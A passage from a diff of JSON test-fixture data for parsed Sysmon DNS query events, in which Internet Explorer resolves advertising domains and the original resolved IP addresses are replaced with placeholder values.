Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13444,23 +13293,23 @@ "type": "CNAME" }, { - "data": "107.21.14.70", + "data": "89.160.20.156", "type": "A" }, { - "data": "107.23.33.163", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.22.192.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "100.24.96.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13468,18 +13317,18 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "107.21.14.70", - "107.23.33.163", - "23.22.192.59", - "100.24.96.238", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -13496,19 +13345,16 @@ "x.dlx.addthis.com" ], "ip": [ - "107.21.14.70", - "107.23.33.163", - "23.22.192.59", - "100.24.96.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313911757Z", + "ingested": "2021-12-09T13:49:44.739744500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13576,15 +13422,15 @@ "type": "CNAME" }, { - "data": "18.205.112.71", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.40.146", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13592,7 +13438,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13600,18 +13446,18 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "18.205.112.71", - "50.19.40.146", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -13628,19 +13474,18 @@ "dh.serving-sys.com" ], "ip": [ - "18.205.112.71", - "50.19.40.146", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313913085Z", + "ingested": "2021-12-09T13:49:44.739750500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13704,39 +13549,39 @@ "type": "CNAME" }, { - "data": "52.55.160.246", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.211.67.240", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.173.61.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.179.235", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.228.105.237", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.7.23.213", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.201.177.113", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.235.70.251", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13744,7 +13589,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13753,17 +13598,17 @@ } ], "resolved_ip": [ - "52.55.160.246", - "3.211.67.240", - "35.173.61.59", - "34.233.179.235", - "34.228.105.237", - "52.7.23.213", - "52.201.177.113", - "34.235.70.251", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30" ] }, @@ -13780,24 +13625,17 @@ "match.sharethrough.com" ], "ip": [ - "52.55.160.246", - "3.211.67.240", - "35.173.61.59", - "34.233.179.235", - "34.228.105.237", - "52.7.23.213", - "52.201.177.113", - "34.235.70.251", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313914313Z", + "ingested": "2021-12-09T13:49:44.739756300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13857,11 +13695,11 @@ }, "answers": [ { - "data": "35.241.16.233", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13869,7 +13707,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13877,7 +13715,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -13885,7 +13723,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -13893,7 +13731,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -13902,16 +13740,16 @@ } ], "resolved_ip": [ - "35.241.16.233", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -13927,23 +13765,23 @@ "tags.rd.linksynergy.com" ], "ip": [ - "35.241.16.233", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313915631Z", + "ingested": "2021-12-09T13:49:44.739762100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", @@ -14011,11 +13849,11 @@ "type": "CNAME" }, { - "data": "199.187.193.166", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14023,7 +13861,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14031,7 +13869,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14039,19 +13877,19 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "199.187.193.166", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -14068,20 +13906,20 @@ "rtb-csync.smartadserver.com" ], "ip": [ - "199.187.193.166", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313916855Z", + "ingested": "2021-12-09T13:49:44.739768Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", @@ -14145,11 +13983,11 @@ "type": "CNAME" }, { - "data": "199.166.0.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14157,7 +13995,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14165,7 +14003,7 @@ "type": "AAAA" }, { - "data": 